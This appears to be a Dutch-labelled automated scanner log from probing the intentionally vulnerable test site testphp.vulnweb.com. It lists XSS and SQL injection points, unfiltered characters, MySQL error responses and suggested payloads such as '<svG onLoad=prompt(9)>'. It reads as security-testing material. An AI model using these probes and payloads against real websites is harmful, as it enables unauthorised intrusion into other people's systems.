[!] Mogelijke XSS-kwetsbaarheden op testphp.vulnweb.com:
---
[i] URL: http://testphp.vulnweb.com
[i] Response URL: http://testphp.vulnweb.com/search.php?test=query
[i] POST URL: http://testphp.vulnweb.com/search.php?test=query
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjck'"(){}<x>:/1zqjck;9
[+] Type: form
[+] Injectiepunten: searchFor
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <h2 id='pagename'>searched for: 1zqjck'"(){}<x>:/1zqjck;9

[i] URL: http://testphp.vulnweb.com/login.php
[i] Response URL: http://testphp.vulnweb.com/userinfo.php
[i] POST URL: http://testphp.vulnweb.com/userinfo.php
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjuo'"(){}<x>:/1zqjuo;9
[+] Type: form
[+] Injectiepunten: pass
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/hpp/?pp=12
[i] Response URL: http://testphp.vulnweb.com/hpp/?pp=1zqjdg'%22()%7B%7D%3Cx%3E:/1zqjdg;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjdg'"(){}<x>:/1zqjdg;9
[+] Type: url
[+] Injectiepunten: pp
[+] Mogelijke payloads: x"><svG onLoad=prompt(9)>, x" onmouseover=prompt(9) ", x"/onmouseover=prompt(9)/"
[i] Line: <a href="params.php?p=valid&pp=1zqjdg'"(){}<x>:/1zqjdg;9

[i] URL: http://testphp.vulnweb.com/guestbook.php
[i] Response URL: http://testphp.vulnweb.com/guestbook.php
[i] POST URL: http://testphp.vulnweb.com/guestbook.php
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjmf'"(){}<x>:/1zqjmf;9
[+] Type: form
[+] Injectiepunten: text
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <img src="/images/remark.gif">&nbsp;&nbsp;1zqjmf'"(){}<x>:/1zqjmf;9

[i] URL: http://testphp.vulnweb.com/guestbook.php
[i] Response URL: http://testphp.vulnweb.com/guestbook.php
[i] POST URL: http://testphp.vulnweb.com/guestbook.php
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjmf'"(){}<x>:/1zqjmf;9
[+] Type: form
[+] Injectiepunten: name
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <strong>1zqjmf'"(){}<x>:/1zqjmf;9

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=3
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjmn'%22()%7B%7D%3Cx%3E:/1zqjmn;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjmn'"(){}<x>:/1zqjmn;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=3
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjmn'%22()%7B%7D%3Cx%3E:/1zqjmn;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjmn'"(){}<x>:/1zqjmn;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjmn;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=4
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjjw'%22()%7B%7D%3Cx%3E:/1zqjjw;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjjw'"(){}<x>:/1zqjjw;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=4
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjjw'%22()%7B%7D%3Cx%3E:/1zqjjw;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjjw'"(){}<x>:/1zqjjw;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjjw;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/artists.php?artist=1
[i] Response URL: http://testphp.vulnweb.com/artists.php?artist=1zqjrh'%22()%7B%7D%3Cx%3E:/1zqjrh;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjrh'"(){}<x>:/1zqjrh;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/artists.php?artist=2
[i] Response URL: http://testphp.vulnweb.com/artists.php?artist=1zqjsh'%22()%7B%7D%3Cx%3E:/1zqjsh;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjsh'"(){}<x>:/1zqjsh;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/product.php?pic=5
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjsn'%22()%7B%7D%3Cx%3E:/1zqjsn;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjsn'"(){}<x>:/1zqjsn;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/7.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjid'%22()%7B%7D%3Cx%3E:/1zqjid;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjid'"(){}<x>:/1zqjid;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjid'"(){}<x>:/1zqjid;9

[i] URL: http://testphp.vulnweb.com/product.php?pic=3
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjjk'%22()%7B%7D%3Cx%3E:/1zqjjk;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjjk'"(){}<x>:/1zqjjk;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/5.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjru'%22()%7B%7D%3Cx%3E:/1zqjru;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjru'"(){}<x>:/1zqjru;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjru'"(){}<x>:/1zqjru;9

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/4.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjsd'%22()%7B%7D%3Cx%3E:/1zqjsd;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjsd'"(){}<x>:/1zqjsd;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjsd'"(){}<x>:/1zqjsd;9

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/3.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjsq'%22()%7B%7D%3Cx%3E:/1zqjsq;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjsq'"(){}<x>:/1zqjsq;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjsq'"(){}<x>:/1zqjsq;9

[i] URL: http://testphp.vulnweb.com/product.php?pic=2
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjzm'%22()%7B%7D%3Cx%3E:/1zqjzm;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjzm'"(){}<x>:/1zqjzm;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/1.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjoo'%22()%7B%7D%3Cx%3E:/1zqjoo;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjoo'"(){}<x>:/1zqjoo;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjoo'"(){}<x>:/1zqjoo;9

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=1
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjdd'%22()%7B%7D%3Cx%3E:/1zqjdd;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjdd'"(){}<x>:/1zqjdd;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=1
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjdd'%22()%7B%7D%3Cx%3E:/1zqjdd;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjdd'"(){}<x>:/1zqjdd;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjdd;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/product.php?pic=1
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjrv'%22()%7B%7D%3Cx%3E:/1zqjrv;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjrv'"(){}<x>:/1zqjrv;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=2
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjse'%22()%7B%7D%3Cx%3E:/1zqjse;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjse'"(){}<x>:/1zqjse;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=2
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjse'%22()%7B%7D%3Cx%3E:/1zqjse;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjse'"(){}<x>:/1zqjse;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjse;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/2.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjtn'%22()%7B%7D%3Cx%3E:/1zqjtn;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjtn'"(){}<x>:/1zqjtn;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjtn'"(){}<x>:/1zqjtn;9

[i] URL: http://testphp.vulnweb.com/product.php?pic=4
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjdu'%22()%7B%7D%3Cx%3E:/1zqjdu;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjdu'"(){}<x>:/1zqjdu;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/product.php?pic=7
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjtb'%22()%7B%7D%3Cx%3E:/1zqjtb;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjtb'"(){}<x>:/1zqjtb;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/artists.php?artist=3
[i] Response URL: http://testphp.vulnweb.com/artists.php?artist=1zqjyf'%22()%7B%7D%3Cx%3E:/1zqjyf;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjyf'"(){}<x>:/1zqjyf;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=2
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjxx'%22()%7B%7D%3Cx%3E:/1zqjxx;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjxx'"(){}<x>:/1zqjxx;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=2
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjxx'%22()%7B%7D%3Cx%3E:/1zqjxx;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjxx'"(){}<x>:/1zqjxx;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjxx;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=12
[i] Response URL: http://testphp.vulnweb.com/hpp/params.php?p=1zqjhn'%22()%7B%7D%3Cx%3E:/1zqjhn;9&pp=12
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjhn'"(){}<x>:/1zqjhn;9
[+] Type: url
[+] Injectiepunten: p
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p1zqjhn'"(){}<x>:/1zqjhn;9

[i] URL: http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=12
[i] Response URL: http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=1zqjvx'%22()%7B%7D%3Cx%3E:/1zqjvx;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjvx'"(){}<x>:/1zqjvx;9
[+] Type: url
[+] Injectiepunten: pp
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <pvalid1zqjvx'"(){}<x>:/1zqjvx;9

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=1
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjwm'%22()%7B%7D%3Cx%3E:/1zqjwm;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjwm'"(){}<x>:/1zqjwm;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=1
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjwm'%22()%7B%7D%3Cx%3E:/1zqjwm;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjwm'"(){}<x>:/1zqjwm;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjwm;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=3
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjpj'%22()%7B%7D%3Cx%3E:/1zqjpj;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjpj'"(){}<x>:/1zqjpj;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=3
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjpj'%22()%7B%7D%3Cx%3E:/1zqjpj;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjpj'"(){}<x>:/1zqjpj;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjpj;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/product.php?pic=6
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjcj'%22()%7B%7D%3Cx%3E:/1zqjcj;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjcj'"(){}<x>:/1zqjcj;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/6.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjma'%22()%7B%7D%3Cx%3E:/1zqjma;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjma'"(){}<x>:/1zqjma;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjma'"(){}<x>:/1zqjma;9
